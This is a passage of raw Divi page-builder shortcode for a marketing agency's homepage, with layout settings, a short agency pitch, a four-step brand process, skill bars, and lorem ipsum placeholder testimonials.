animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||56px|21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" 